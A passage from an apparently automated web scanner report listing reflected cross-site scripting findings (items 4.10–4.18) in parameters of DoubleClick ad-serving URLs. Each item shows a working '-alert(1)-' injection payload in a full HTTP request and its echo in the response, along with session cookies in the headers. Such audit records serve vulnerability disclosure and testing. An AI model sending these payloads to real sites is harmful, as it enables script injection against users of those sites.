Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-1254652388917369&output=html&h=600&slotname=3135197487&w=160&lmt=1300659268&flash=10.2.154&url=http%3A%2F%2Fwww.alexa.com%2Fsiteinfo%2Fxss.cx&dt=1300641268294&bpp=6&shv=r20110315&jsv=r20110317&prev_fmts=336x280_as&prev_slotnames=7625873888&correlator=1300641268399&frm=0&adk=3059816711&ga_vid=259840090.1300641268&ga_sid=1300641268&ga_hid=1855413439&ga_fc=1&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1096&bih=916&fu=0&ifi=3&dtd=257&xpc=TZi5ezzzc8&p=http%3A//www.alexa.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; L2676=1.1300710919721

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sun, 20 Mar 2011 17:15:10 GMT
Vary: Accept-Encoding
Expires: Sun, 20 Mar 2011 17:15:10 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 4981

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 12,381 Template Name = In-Page Flash Banner w/ DoubleVerif
...[SNIP]...
LA6I0CiujKqBq-oOWYNpCf2gMQARgBINydnhA4AFCulJOBB2DJBqABpuKz6gOyAQ13d3cuYWxleGEuY29tugEKMTYweDYwMF9hc8gBCdoBJGh0dHA6Ly93d3cuYWxleGEuY29tL3NpdGVpbmZvL3hzcy5jeOABA7gCGMACBcgC8rWcG6gDAdEDX7TNu-ilXeT1AwAAAAQa8e99"-alert(1)-"97bc0f3b553&num=1&sig=AGiWqtzUVNt4cstzffq0L0DBK_CnmL_HbQ&client=ca-pub-1254652388917369&adurl=http%3a%2f%2fwww.dishnetwork.com/redirects/promotion/offer22/default.aspx%3Futm_source%3Dgoogle%26utm_medium%3Ddisplay
...[SNIP]...

4.10. http://ad.doubleclick.net/adi/N5315.150143.0288179548321/B5334493.21 [client parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5315.150143.0288179548321/B5334493.21

Issue detail

The value of the client request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3bafa"-alert(1)-"d8c8c6c02f6 was submitted in the client parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adi/N5315.150143.0288179548321/B5334493.21;sz=160x600;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=B2ZKC4TWGTZndLcvOlQe3_pi4DpLA6I0CiujKqBq-oOWYNpCf2gMQARgBINydnhA4AFCulJOBB2DJBqABpuKz6gOyAQ13d3cuYWxleGEuY29tugEKMTYweDYwMF9hc8gBCdoBJGh0dHA6Ly93d3cuYWxleGEuY29tL3NpdGVpbmZvL3hzcy5jeOABA7gCGMACBcgC8rWcG6gDAdEDX7TNu-ilXeT1AwAAAAQ&num=1&sig=AGiWqtzUVNt4cstzffq0L0DBK_CnmL_HbQ&client=ca-pub-12546523889173693bafa"-alert(1)-"d8c8c6c02f6&adurl=;ord=862444845? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-1254652388917369&output=html&h=600&slotname=3135197487&w=160&lmt=1300659268&flash=10.2.154&url=http%3A%2F%2Fwww.alexa.com%2Fsiteinfo%2Fxss.cx&dt=1300641268294&bpp=6&shv=r20110315&jsv=r20110317&prev_fmts=336x280_as&prev_slotnames=7625873888&correlator=1300641268399&frm=0&adk=3059816711&ga_vid=259840090.1300641268&ga_sid=1300641268&ga_hid=1855413439&ga_fc=1&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1096&bih=916&fu=0&ifi=3&dtd=257&xpc=TZi5ezzzc8&p=http%3A//www.alexa.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; L2676=1.1300710919721

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sun, 20 Mar 2011 17:17:04 GMT
Vary: Accept-Encoding
Expires: Sun, 20 Mar 2011 17:17:04 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 4981

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 12,381 Template Name = In-Page Flash Banner w/ DoubleVerif
...[SNIP]...
EuY29tugEKMTYweDYwMF9hc8gBCdoBJGh0dHA6Ly93d3cuYWxleGEuY29tL3NpdGVpbmZvL3hzcy5jeOABA7gCGMACBcgC8rWcG6gDAdEDX7TNu-ilXeT1AwAAAAQ&num=1&sig=AGiWqtzUVNt4cstzffq0L0DBK_CnmL_HbQ&client=ca-pub-12546523889173693bafa"-alert(1)-"d8c8c6c02f6&adurl=http%3a%2f%2fwww.dishnetwork.com/redirects/promotion/offer22/default.aspx%3Futm_source%3Dgoogle%26utm_medium%3Ddisplay%26utm_campaign%3Dtestbooyah");
var wmode = "opaque";
var bg = "ffffff";
var
...[SNIP]...

4.11. http://ad.doubleclick.net/adi/N5315.150143.0288179548321/B5334493.21 [num parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5315.150143.0288179548321/B5334493.21

Issue detail

The value of the num request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bbc00"-alert(1)-"a8ca45bd5fa was submitted in the num parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adi/N5315.150143.0288179548321/B5334493.21;sz=160x600;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=B2ZKC4TWGTZndLcvOlQe3_pi4DpLA6I0CiujKqBq-oOWYNpCf2gMQARgBINydnhA4AFCulJOBB2DJBqABpuKz6gOyAQ13d3cuYWxleGEuY29tugEKMTYweDYwMF9hc8gBCdoBJGh0dHA6Ly93d3cuYWxleGEuY29tL3NpdGVpbmZvL3hzcy5jeOABA7gCGMACBcgC8rWcG6gDAdEDX7TNu-ilXeT1AwAAAAQ&num=1bbc00"-alert(1)-"a8ca45bd5fa&sig=AGiWqtzUVNt4cstzffq0L0DBK_CnmL_HbQ&client=ca-pub-1254652388917369&adurl=;ord=862444845? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-1254652388917369&output=html&h=600&slotname=3135197487&w=160&lmt=1300659268&flash=10.2.154&url=http%3A%2F%2Fwww.alexa.com%2Fsiteinfo%2Fxss.cx&dt=1300641268294&bpp=6&shv=r20110315&jsv=r20110317&prev_fmts=336x280_as&prev_slotnames=7625873888&correlator=1300641268399&frm=0&adk=3059816711&ga_vid=259840090.1300641268&ga_sid=1300641268&ga_hid=1855413439&ga_fc=1&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1096&bih=916&fu=0&ifi=3&dtd=257&xpc=TZi5ezzzc8&p=http%3A//www.alexa.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; L2676=1.1300710919721

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sun, 20 Mar 2011 17:15:45 GMT
Vary: Accept-Encoding
Expires: Sun, 20 Mar 2011 17:15:45 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 4981

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 12,381 Template Name = In-Page Flash Banner w/ DoubleVerif
...[SNIP]...
iujKqBq-oOWYNpCf2gMQARgBINydnhA4AFCulJOBB2DJBqABpuKz6gOyAQ13d3cuYWxleGEuY29tugEKMTYweDYwMF9hc8gBCdoBJGh0dHA6Ly93d3cuYWxleGEuY29tL3NpdGVpbmZvL3hzcy5jeOABA7gCGMACBcgC8rWcG6gDAdEDX7TNu-ilXeT1AwAAAAQ&num=1bbc00"-alert(1)-"a8ca45bd5fa&sig=AGiWqtzUVNt4cstzffq0L0DBK_CnmL_HbQ&client=ca-pub-1254652388917369&adurl=http%3a%2f%2fwww.dishnetwork.com/redirects/promotion/offer22/default.aspx%3Futm_source%3Dgoogle%26utm_medium%3Ddisplay%26utm
...[SNIP]...

4.12. http://ad.doubleclick.net/adi/N5315.150143.0288179548321/B5334493.21 [sig parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5315.150143.0288179548321/B5334493.21

Issue detail

The value of the sig request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 561bf"-alert(1)-"af108c5ab54 was submitted in the sig parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adi/N5315.150143.0288179548321/B5334493.21;sz=160x600;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=B2ZKC4TWGTZndLcvOlQe3_pi4DpLA6I0CiujKqBq-oOWYNpCf2gMQARgBINydnhA4AFCulJOBB2DJBqABpuKz6gOyAQ13d3cuYWxleGEuY29tugEKMTYweDYwMF9hc8gBCdoBJGh0dHA6Ly93d3cuYWxleGEuY29tL3NpdGVpbmZvL3hzcy5jeOABA7gCGMACBcgC8rWcG6gDAdEDX7TNu-ilXeT1AwAAAAQ&num=1&sig=AGiWqtzUVNt4cstzffq0L0DBK_CnmL_HbQ561bf"-alert(1)-"af108c5ab54&client=ca-pub-1254652388917369&adurl=;ord=862444845? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-1254652388917369&output=html&h=600&slotname=3135197487&w=160&lmt=1300659268&flash=10.2.154&url=http%3A%2F%2Fwww.alexa.com%2Fsiteinfo%2Fxss.cx&dt=1300641268294&bpp=6&shv=r20110315&jsv=r20110317&prev_fmts=336x280_as&prev_slotnames=7625873888&correlator=1300641268399&frm=0&adk=3059816711&ga_vid=259840090.1300641268&ga_sid=1300641268&ga_hid=1855413439&ga_fc=1&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1096&bih=916&fu=0&ifi=3&dtd=257&xpc=TZi5ezzzc8&p=http%3A//www.alexa.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; L2676=1.1300710919721

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sun, 20 Mar 2011 17:16:29 GMT
Vary: Accept-Encoding
Expires: Sun, 20 Mar 2011 17:16:29 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 4981

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 12,381 Template Name = In-Page Flash Banner w/ DoubleVerif
...[SNIP]...
BB2DJBqABpuKz6gOyAQ13d3cuYWxleGEuY29tugEKMTYweDYwMF9hc8gBCdoBJGh0dHA6Ly93d3cuYWxleGEuY29tL3NpdGVpbmZvL3hzcy5jeOABA7gCGMACBcgC8rWcG6gDAdEDX7TNu-ilXeT1AwAAAAQ&num=1&sig=AGiWqtzUVNt4cstzffq0L0DBK_CnmL_HbQ561bf"-alert(1)-"af108c5ab54&client=ca-pub-1254652388917369&adurl=http%3a%2f%2fwww.dishnetwork.com/redirects/promotion/offer22/default.aspx%3Futm_source%3Dgoogle%26utm_medium%3Ddisplay%26utm_campaign%3Dtestbooyah");
var wmode = "
...[SNIP]...

4.13. http://ad.doubleclick.net/adi/N5315.150143.0288179548321/B5334493.21 [sz parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5315.150143.0288179548321/B5334493.21

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a2783"-alert(1)-"7deaeb24a8f was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adi/N5315.150143.0288179548321/B5334493.21;sz=160x600;click=http://googleads.g.doubleclick.net/aclk?sa=la2783"-alert(1)-"7deaeb24a8f&ai=B2ZKC4TWGTZndLcvOlQe3_pi4DpLA6I0CiujKqBq-oOWYNpCf2gMQARgBINydnhA4AFCulJOBB2DJBqABpuKz6gOyAQ13d3cuYWxleGEuY29tugEKMTYweDYwMF9hc8gBCdoBJGh0dHA6Ly93d3cuYWxleGEuY29tL3NpdGVpbmZvL3hzcy5jeOABA7gCGMACBcgC8rWcG6gDAdEDX7TNu-ilXeT1AwAAAAQ&num=1&sig=AGiWqtzUVNt4cstzffq0L0DBK_CnmL_HbQ&client=ca-pub-1254652388917369&adurl=;ord=862444845? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-1254652388917369&output=html&h=600&slotname=3135197487&w=160&lmt=1300659268&flash=10.2.154&url=http%3A%2F%2Fwww.alexa.com%2Fsiteinfo%2Fxss.cx&dt=1300641268294&bpp=6&shv=r20110315&jsv=r20110317&prev_fmts=336x280_as&prev_slotnames=7625873888&correlator=1300641268399&frm=0&adk=3059816711&ga_vid=259840090.1300641268&ga_sid=1300641268&ga_hid=1855413439&ga_fc=1&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1096&bih=916&fu=0&ifi=3&dtd=257&xpc=TZi5ezzzc8&p=http%3A//www.alexa.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; L2676=1.1300710919721

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sun, 20 Mar 2011 17:14:41 GMT
Vary: Accept-Encoding
Expires: Sun, 20 Mar 2011 17:14:41 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 4981

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 12,381 Template Name = In-Page Flash Banner w/ DoubleVerif
...[SNIP]...
= escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3ad0/f/183/%2a/t%3B238208792%3B0-0%3B0%3B61271547%3B2321-160/600%3B41152694/41170481/1%3B%3B%7Esscs%3D%3fhttp://googleads.g.doubleclick.net/aclk?sa=la2783"-alert(1)-"7deaeb24a8f&ai=B2ZKC4TWGTZndLcvOlQe3_pi4DpLA6I0CiujKqBq-oOWYNpCf2gMQARgBINydnhA4AFCulJOBB2DJBqABpuKz6gOyAQ13d3cuYWxleGEuY29tugEKMTYweDYwMF9hc8gBCdoBJGh0dHA6Ly93d3cuYWxleGEuY29tL3NpdGVpbmZvL3hzcy5jeOABA7gCGMACBcgC
...[SNIP]...

4.14. http://ad.doubleclick.net/adj/N2998.134236.9345108740621/B5095412.5 [c parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N2998.134236.9345108740621/B5095412.5

Issue detail

The value of the c request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ff315'-alert(1)-'17113cbd15f was submitted in the c parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/N2998.134236.9345108740621/B5095412.5;sz=120x600;pc=[TPAS_ID];click=http://media.fastclick.net/w/click.here?cid=232134&mid=513855&m=3&sid=54113&c=0ff315'-alert(1)-'17113cbd15f&tp=3&forced_click=;ord=20110320172908? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://cache.techie-buzz.com/ads/120_sidebar_filler.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; L2676=1.1300710919721

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sun, 20 Mar 2011 17:30:54 GMT
Vary: Accept-Encoding
Expires: Sun, 20 Mar 2011 17:30:54 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6736

document.write('<!-- Template Id = 14,337 Template Name = Watermark & DV Banner Creative (Flash) - In Page -->\n<script src=\"http://s0.2mdn.net/879366/flashwrite_1_2.js\"><\/script>');document.write(
...[SNIP]...
B234167733%3B1-0%3B0%3B57514523%3B933-120/600%3B40960228/40978015/1%3B%3B%7Eokv%3D%3Bpc%3D%5BTPAS_ID%5D%3B%3B%7Esscs%3D%3fhttp://media.fastclick.net/w/click.here?cid=232134&mid=513855&m=3&sid=54113&c=0ff315'-alert(1)-'17113cbd15f&tp=3&forced_click=http%3a%2f%2fdata.aggregateknowledge.com/pixel%21t%3D651%21%3Fche%3D2975056%26camid%3D5095412%26plaid%3D57514523%26creid%3D40960228%26adgid%3D234167733%26l1%3Dhttp%253A%252F%252Fwww.
...[SNIP]...

4.15. http://ad.doubleclick.net/adj/N2998.134236.9345108740621/B5095412.5 [c parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N2998.134236.9345108740621/B5095412.5

Issue detail

The value of the c request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 55fb1"-alert(1)-"3937b134a54 was submitted in the c parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/N2998.134236.9345108740621/B5095412.5;sz=120x600;pc=[TPAS_ID];click=http://media.fastclick.net/w/click.here?cid=232134&mid=513855&m=3&sid=54113&c=055fb1"-alert(1)-"3937b134a54&tp=3&forced_click=;ord=20110320172908? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://cache.techie-buzz.com/ads/120_sidebar_filler.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; L2676=1.1300710919721

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sun, 20 Mar 2011 17:30:49 GMT
Vary: Accept-Encoding
Expires: Sun, 20 Mar 2011 17:30:49 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6736

document.write('<!-- Template Id = 14,337 Template Name = Watermark & DV Banner Creative (Flash) - In Page -->\n<script src=\"http://s0.2mdn.net/879366/flashwrite_1_2.js\"><\/script>');document.write(
...[SNIP]...
2mdn.net/2981993/120x600_030411_CPO_GENERIC.jpg";
var minV = 6;
var FWH = ' width="120" height="600" ';
var url = escape("http://media.fastclick.net/w/click.here?cid=232134&mid=513855&m=3&sid=54113&c=055fb1"-alert(1)-"3937b134a54&tp=3&forced_click=http%3a%2f%2fdata.aggregateknowledge.com/pixel%21t%3D651%21%3Fche%3D2970103%26camid%3D5095412%26plaid%3D57514523%26creid%3D40960228%26adgid%3D234167733%26l1%3Dhttp%253A%252F%252Fwww.
...[SNIP]...

4.16. http://ad.doubleclick.net/adj/N2998.134236.9345108740621/B5095412.5 [forced_click parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N2998.134236.9345108740621/B5095412.5

Issue detail

The value of the forced_click request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a3ca3'-alert(1)-'54b41a5bbc9 was submitted in the forced_click parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/N2998.134236.9345108740621/B5095412.5;sz=120x600;pc=[TPAS_ID];click=http://media.fastclick.net/w/click.here?cid=232134&mid=513855&m=3&sid=54113&c=0&tp=3&forced_click=a3ca3'-alert(1)-'54b41a5bbc9 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://cache.techie-buzz.com/ads/120_sidebar_filler.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; L2676=1.1300710919721

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 6627
Cache-Control: no-cache
Pragma: no-cache
Date: Sun, 20 Mar 2011 17:31:12 GMT
Expires: Sun, 20 Mar 2011 17:31:12 GMT

document.write('<!-- Template Id = 14,337 Template Name = Watermark & DV Banner Creative (Flash) - In Page -->\n<script src=\"http://s0.2mdn.net/879366/flashwrite_1_2.js\"><\/script>');document.write(
...[SNIP]...
0%3B57514523%3B933-120/600%3B40789782/40807569/1%3B%3B%7Eokv%3D%3Bpc%3D%5BTPAS_ID%5D%3B%3B%7Esscs%3D%3fhttp://media.fastclick.net/w/click.here?cid=232134&mid=513855&m=3&sid=54113&c=0&tp=3&forced_click=a3ca3'-alert(1)-'54b41a5bbc9http://data.aggregateknowledge.com/pixel!t=651!?che=2992431&camid=5095412&plaid=57514523&creid=40789782&adgid=234167733&l1=http%3A%2F%2Fwww.verizonwireless.com%2Fb2c%2Fpromotion%2Fspecialoffers.jsp%3Fc
...[SNIP]...

4.17. http://ad.doubleclick.net/adj/N2998.134236.9345108740621/B5095412.5 [forced_click parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N2998.134236.9345108740621/B5095412.5

Issue detail

The value of the forced_click request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 73347"-alert(1)-"54369acb972 was submitted in the forced_click parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/N2998.134236.9345108740621/B5095412.5;sz=120x600;pc=[TPAS_ID];click=http://media.fastclick.net/w/click.here?cid=232134&mid=513855&m=3&sid=54113&c=0&tp=3&forced_click=73347"-alert(1)-"54369acb972 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://cache.techie-buzz.com/ads/120_sidebar_filler.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; L2676=1.1300710919721

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 6580
Cache-Control: no-cache
Pragma: no-cache
Date: Sun, 20 Mar 2011 17:31:07 GMT
Expires: Sun, 20 Mar 2011 17:31:07 GMT

document.write('<!-- Template Id = 14,337 Template Name = Watermark & DV Banner Creative (Flash) - In Page -->\n<script src=\"http://s0.2mdn.net/879366/flashwrite_1_2.js\"><\/script>');document.write(
...[SNIP]...
0x600_030411_CPO_GENERIC.jpg";
var minV = 6;
var FWH = ' width="120" height="600" ';
var url = escape("http://media.fastclick.net/w/click.here?cid=232134&mid=513855&m=3&sid=54113&c=0&tp=3&forced_click=73347"-alert(1)-"54369acb972http://data.aggregateknowledge.com/pixel!t=651!?che=2987869&camid=5095412&plaid=57514523&creid=40960228&adgid=234167733&l1=http%3A%2F%2Fwww.verizonwireless.com%2Fb2c%2Fsplash%2Fpreowned.jsp%3Fcid%3DBAC
...[SNIP]...

4.18. http://ad.doubleclick.net/adj/N2998.134236.9345108740621/B5095412.5 [m parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N2998.134236.9345108740621/B5095412.5

Issue detail

The value of the m request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 89c6c'-alert(1)-'73fc593881c was submitted in the m parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/N2998.134236.9345108740621/B5095412.5;sz=120x600;pc=[TPAS_ID];click=http://media.fastclick.net/w/click.here?cid=232134&mid=513855&m=389c6c'-alert(1)-'73fc593881c&sid=54113&c=0&tp=3&forced_click=;ord=20110320172908? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://cache.techie-buzz.com/ads/120_sidebar_filler.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
